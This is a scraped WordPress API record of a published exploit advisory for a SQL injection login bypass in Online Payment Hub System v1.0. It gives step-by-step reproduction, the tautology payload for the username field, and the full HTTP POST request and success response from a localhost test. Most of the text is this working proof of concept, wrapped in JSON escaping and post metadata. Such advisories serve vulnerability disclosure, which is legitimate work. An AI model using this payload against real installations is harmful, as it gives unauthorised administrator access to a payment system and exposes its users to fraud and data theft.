# Exploit Title: Online Payment Hub System – SQLi Authentication Bypass
# Date: 29.05.2024
# Exploit Author: Hamit Av\u015far
# Vendor Homepage: https:\/\/www.sourcecodester.com\/php\/15018\/online-payment-hub-using-php-and-paypal-free-source-code.html
# Software Link: https:\/\/www.sourcecodester.com\/download-code?nid=15018&title=Online+Payment+Hub+using+PHP+and+PayPal+Free+Source+Code
# Version: 1.0
# Tested on: Windows 11, Kali Linux
# Online Payment Hub System v1.0 Login page can be bypassed with a simple SQLi to the username parameter.<\/p>\n
Steps To Reproduce:
1 – Go to the login page http:\/\/localhost\/oph\/admin\/login.php
2 – Enter the payload to username field as “admin’ or ‘1’=’1” without double-quotes and type anything to password field.
3 – Click on “Login” button and you are logged in as administrator.<\/p>\n
PoC<\/p>\n
Request<\/p>\n
POST \/oph\/classes\/Login.php?f=login HTTP\/1.1
Host: localhost
Content-Length: 42
sec-ch-ua: “Chromium”;v=”111″, “Not(A:Brand”;v=”8″
Accept: *\/*
Content-Type: application\/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/111.0.5563.65 Safari\/537.36
sec-ch-ua-platform: “Windows”
Origin: http:\/\/localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http:\/\/localhost\/oph\/admin\/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=9f8v4097jovtf6a3igi4l6479i
Connection: close<\/p>\n
username=admin’+or+’1’%3D’1&password=hamit<\/p>\n
——————————————————————————————————————————–<\/p>\n
response<\/p>\n
HTTP\/1.1 200 OK
Date: Wed, 29 May 2024 17:15:28 GMT
Server: Apache\/2.4.58 (Win64) OpenSSL\/3.1.3 PHP\/8.0.30
X-Powered-By: PHP\/8.0.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 20
Connection: close
Content-Type: text\/html; charset=UTF-8<\/p>\n
{“status”:”success”}<\/p>\n","protected":false},"excerpt":{"rendered":"
# Exploit Title: Online Payment Hub System – SQLi Authentication Bypass# Date: 29.05.2024# Exploit Author: Hamit Av\u015far# Vendor Homepage: https:\/\/www.sourcecodester.com\/php\/15018\/online-payment-hub-using-php-and-paypal-free-source-code.html# Software Link: https:\/\/www.sourcecodester.com\/download-code?nid=15018&title=Online+Payment+Hub+using+PHP+and+PayPal+Free+Source+Code# Version: 1.0# Tested on: Windows 11, Kali Linux# Online Payment Hub System v1.0 Login page can be bypassed with a simple SQLi to the username parameter. Steps To Reproduce:1 – Go to …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-57205","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57205","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=57205"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57205\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=57205"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=57205"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=57205"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}